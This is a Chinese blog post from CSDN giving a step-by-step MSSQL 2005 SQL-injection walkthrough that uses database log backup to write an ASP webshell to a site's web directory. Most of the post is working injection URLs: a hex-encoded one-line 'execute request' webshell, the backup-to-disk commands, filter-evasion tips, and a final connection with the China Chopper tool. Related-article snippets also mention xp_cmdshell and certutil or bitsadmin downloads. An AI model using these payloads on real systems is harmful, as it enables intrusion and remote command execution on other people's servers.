mysql差异备份数据库get shell_Web渗透之mssql2005 差异备份getshell

最新推荐文章于 2023-04-24 19:18:43 发布
最新推荐文章于 2023-04-24 19:18:43 发布
阅读量188 收藏
点赞数
文章标签: mysql差异备份数据库get shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30781905/article/details/113237928
版权

这里记录下mssql2005差异备份拿shell的过程

http://192.168.5.21:81/index.asp?id=1;alter/**/database/**/[asp_test]/**/set/**/recovery/**/full--

588ec2dfcddda8ee1f2293b57e785e8a.png

1e6dbc007e702593b5226ecfa99d5b9f.png

http://192.168.5.21:81/index.asp?id=1;;drop/**/table/**/[itpro]--

9e136386e1cee9e243f4a3b0c5b3c609.png

http://192.168.5.21:81/index.asp?id=1;create/**/table/**/[itpro]([a]/**/image)--

66836b6a142d0ccd4a2b3241d3c4257c.png

http://192.168.5.21:81/index.asp?id=1;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[asp_test]/**/to/**/disk=@d/**/with/**/init--

bb0dcb7e9c105bef40bfa799730c1851.png

http://192.168.5.21:81/index.asp?id=1;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--

5abe24be4a977c197c873daeb26369b6.png

http://192.168.5.21:81/index.asp?id=1;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x45003A005C0077007700770072006F006F0074005C006100730070005F00730071006C0069005C006800610063006B002E00610073007000/**/backup/**/log/**/[asp_test]/**/to/**/disk=@d/**/with/**/init--

0785792d04be78c5973a8ce79ca02cbe.png

http://192.168.5.21:81/index.asp?id=1;drop/**/table/**/[itpro]--

65508938966157dfec84aaf3f925f875.png

http://192.168.5.21:81/index.asp?id=1;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[asp_test]/**/to/**/disk=@d/**/with/**/init--

025e3da38010d91ac5fca955662b9a30.png

0bf1369febe1bde383827fceb96d4fe0.png

菜刀连接即可

f3a8de7dd77ccbbc32ee1676f33dcbdc.png

其中红色的“asp_test”是数据库名,这个要根据自己的情况来修改,

然后的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“”的内容,

另外“0x45003A005C0077007700770072006F006F0074005C006100730070005F00730071006C0069005C006800610063006B002E00610073007000”为备份的路径“E:\wwwroot\asp_sqli\hack.asp”,都是使用的SQL_En的格式,

另外第三步大可以不需要!他是删除itpro的表,如果第一次的话这个表是不存在的,就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”,就是使用URL编码。“/**/”就等于空格了,这个大家在学习注入的过程中应该了解,也可以更换成“%20”。

梨飞雪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 备份getshell_数据库备份getshell
weixin_34712106的博客
02-03 675
0x00 前言很久之前通过数据库备份拿到的一个webshell,本来准备等他们修复了之后再写的,但是提交了漏洞和修复方案他们接收之后很长时间没有修复,忽视了漏洞。所以今天写出来了。0x01 多次尝试首先这个站是偶然google hacking时找到的后台弱密码,进入后台之后发现是IIS6.0的服务器:这个后台可以对前端的文章、新闻等进行修改,发现可以上传图片到文章中,是一个上传点。先编辑一个一句话...
mssql差异备份获得的webshell.doc
07-18
mssql差异备份获得的webshellmssql差异备份获得的webshell
MSSQL2005差异备份shell (MSSQL2005 Backup Get Shell)
blogfeifei
07-15 182
昨晚在拿站过程中遇到了个ASP+MSSQL2005的注入点,权限是DB_Owner的权限,网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005备份和MSSQL2000有点不同。 后来在网上搜半天没有找到具体的备份语句,后来在群求助,小冰才发我了具...
Mssqlsqlserver)差异备份getshell思路笔记
来到了学渣的博客
04-05 1732
差异备份的概念(百度百科): 备份自上一次完全备份之后有变化的数据。差异备份过程中,只备份有标记的那些选中的文件和文件夹。它不清除标记,也即备份后不标记为已备份文件。换言之,不清除存档属性。 差异备份getshell条件: 目标站是否存在mssql数据库注入漏洞 目标站的用户是否具备sa权限、dbo权限 找到网站的物理路径 大概思路: 假设:http://xxxxx/show.aspx?c...
mysql差异备份shell_MSSQL2005差异备份shell (MSSQL2005 Backup Get Shell)
weixin_31237295的博客
01-19 211
昨晚在拿站过程中遇到了个ASP+MSSQL2005的注入点,权限是DB_Owner的权限,网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005备份和MSSQL2000有点不同。后来在网上搜半天没有找到具体的备份语句,后来在群求助,小冰才发我了具体...
Java实现SqlServer及MySql备份与还原(经典版).docx
01-13
本篇将详细介绍如何使用Java来实现SQL Server和MySQL这两种常见数据库备份与还原功能。 一、基础准备 首先,我们需要在Java项目中引入相应的数据库驱动。对于SQL Server,我们需要`mssql-jdbc`驱动,而对于MySQL...
K8CScan:K8Cscan大型内网渗透自定义插件化扫描神器,包含信息收集,网络资产,入侵扫描,密码爆破,突破利用,程序采用多线程堆叠扫描大型内网多个IP段C段主机,现有插件包含:C段旁注扫描,子域名扫描,Ftp密码爆破,Mysql密码爆破,Oracle密码爆破,MSSQL密码爆破,WindowsLinux系统密码爆破,存活主机扫描,端口扫描,Web信息检测,操作系统版本检测,Cisco思科设备扫描等,支持调用任意外部程序或脚本,支持Cobalt Strike联动
02-03
5.4版本内置28个功能模块,通过各种协议以及方法快速获取目标网络存活主机IP,计算机名,工作组,网络共享,网卡物理地址,操作系统版本,网站域名,Web中间件,路由器(Cisco),数据库等网络资产信息,内置MS17-...
web渗透测试技巧(下)
10-12
### Web渗透测试技巧(下) #### SQL Injection SQL注入是一种常见的Web应用安全漏洞,攻击者通过将恶意SQL代码插入到应用程序的输入字段中,从而控制数据库执行非授权操作。根据不同的利用方式,SQL注入可以分为...
《安天365安全研究》第二期.pdf
08-07
2.3 从 mysql 注入到 getshell 2.3.1 系统基本信息获取 2.3.2 获取操作系统类型 2.3.3 获取注入点 2.3.4sqlmap 进行验证 2.3.5os-shell 系统命令执行 2.3.6 获取相关信息 2.3.7 寻找可写目录 2.3.8 写一句话木马 ...
cmd:Go编写的用于数据库操作的命令行工具,已移至https:gitea.comxormcmd
02-04
XORM工具 xorm工具是用于数据库操作的一组工具。 源安装 go get github.com/go-xorm/cmd/xorm ...shell一个通用的shell来操作各种数据库 将所有表结构和数据转储到标准输出 源从标准中执行一个SQL 驱动程序列
所有差异备份工具包(getwebshell2,sqlcomm,小志 SQL沙盘提权备份工具.exe,GetWebshellah56bug大众版,MSSQL_UP,DB_OWNER权限备份hta到启动项提权的小工具)
05-02
所有差异备份工具包(getwebshell2,sqlcomm,小志 SQL沙盘提权备份工具.exe,GetWebshellah56bug大众版,MSSQL_UP,DB_OWNER权限备份hta到启动项提权的小工具等等!)
MSSQL2005差异备份shell MSSQL2005 Backup Get Shell
ytfhjhv的博客
11-11 219
MSSQL2005差异备份shell MSSQL2005 Backup Get Shell
mssql 日志备份getshell
qq_82303224_的博客
04-24 327
第二个disk = 写入webshell的网站物理地址。(根目录写不进去可以考虑网站上传目录)二:差异备份:(数据库很小时使用,大了会不成功)bitsadmin 下载文件并写入系统启动项。如果有waf的话可以考虑换个一句话写入。第一个disk = 有权限写入的目录。开启 xp_cmdshell。certutil 下载文件。
一次差异备份shell过程
weixin_33724059的博客
01-24 556
0x00 前言 扫描器扫到了某个网站存在目录浏览,于是便有了本文。。。 知识点科普: 1. 目录浏览 目录浏览在我个人看来是危害较大的一个漏洞,该漏洞是指“在没有默认文档的目录下,列出该目录下所有文件名及文件信息”,如果站点存在这种错误配置,***者如果知道其中目录名,则可以查看到这些目录下的文件。 2.差异备份条件 站点绝对路径 具有路径写入权限 具备当前数据库权限 0x01 ...
mysql 备份getshell_sqlserver的两种备份getshell(干货)
weixin_28691003的博客
02-27 539
log备份这是一种导出日志文件到web路径来getshell的方法本次简述一下通过sqlserver进行getshell的两种方法,payload可以直接拿来用,话不多说,直接往下看就完事了优势:1、重复性好,多次备份的成功率高2、相对于差异备份而言,shell的体积较小利用条件:至少DBO权限1、前提得知绝对路径,并且可写2、站库不分离3、数据库必须被备份过一次第一步:;alter databa...
mysql差异备份数据库get shell_shell进行完整和增量备份mysql数据库
weixin_33603813的博客
02-08 189
shell进行完整和增量备份mysql数据库文档介绍本文档采用mysqldump 对数据库进行备份mysqldump 是采用SQL级别的备份机制,它将数据表导成 SQL脚本文件,在不同的 MySQL 版本之间升级时相对比较合适,这也是最常用的备份方法,mysqldump 比直接拷贝要慢些。本文描述Mysql数据库的自动备份,包括完全备份和增量备份。其中,完全备份每周执行一次,增量备份每天都会执行...
Mysql日常备份和增量备份SHELL脚本
weixin_33694172的博客
01-19 212
每7天备份一次所有数据,每天备份binlog,也就是增量备份. (如果数据少,每天备份一次完整数据即可,可能没必要做增量备份) 作者对shell脚本不太熟悉,所以很多地方写的很笨 :) 开启 bin log 在mysql 4.1版本中,默认只有错误日志,没有其他日志.可以通过修改配置打开bin log.方法很多,其中一个是在/etc/my.cnf中的m...
mysql差异备份shell_MSSQL差异备份shell(转) | 学步园
weixin_39917811的博客
01-19 112
MSSQL差异备份,就是和前一次备份作对比,把不一样的内容备份下来,这样,只要前一次备份后,插入新的内容,差异备份就可以把刚插入的内容备份出来,而这个备份文件将大大减少,得到webShell的成功也提高了不少!差异备份的流程大概这样:1.完整备份一次(保存位置当然可以改)backup database 库名 to disk ='c:\ddd.bak';--2.创建表并插入数据create tabl...
mysql差异备份
qq_43181762的博客
02-22 737
差异备份 备份上一次的完全备份后发生变化的所有文件。 差异备份是指在一次全备份后到进行差异备份的这段时间内 对那些增加或者修改文件的备份。在进行恢复时,我们只需对第一次全量备份和最后一次差异备份进行恢复。 差异备份 查看一下mysql里面表和数据库的信息 [root@wuliyong ~]# mysql -uroot -p Enter password: Welcome to the M...
shell脚本备份mysql_shell脚本备份MySQL数据库
最新发布
08-28
好的,以下是一个备份MySQL数据库Shell脚本示例: ```bash #!/bin/bash # MySQL数据库备份脚本 # 设置备份文件名和目录 BACKUP_DIR="/var/backups/mysql" DATE=$(date +%Y-%m-%d_%H-%M-%S) DB_NAME="mydatabase...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值